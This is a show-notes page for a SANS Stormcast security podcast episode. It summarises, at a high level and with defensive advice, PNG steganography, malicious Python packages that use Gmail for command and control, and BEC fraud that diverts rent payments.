SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast) SANS Stormcast Friday, May 2nd: More Steganography; Malicious Python Packages GMail C2; BEC to Steal Rent Payments
May 2, 2025
Discover the secrets of steganography as techniques for extracting hidden data from images are unveiled. Learn about a new trend where malicious Python packages exploit Gmail for command and control, posing serious risks to developers. Delve into the alarming tactics used by a French threat actor, targeting property management firms to divert tenant rent payments. This insightful discussion sheds light on pressing cybersecurity challenges and offers strategies for better protection.
AI Snips
Chapters
Transcript
Episode notes
Steganography in PNG Images
- PNG images use lossless compression that preserves small bit changes crucial for steganography.
- Extracting hidden data requires tools to decode least significant bits, revealing embedded executables.
Gmail SMTP as C2 Channel
- Malicious Python packages are using Gmail SMTP to create stealthy command and control channels.
- Using legitimate email protocols makes detection on network traffic challenging for defenders.
Preventing BEC Rent Payment Fraud
- Do not rely solely on email to update critical payment information.
- Establish business rules requiring written or in-person verification to prevent BEC fraud.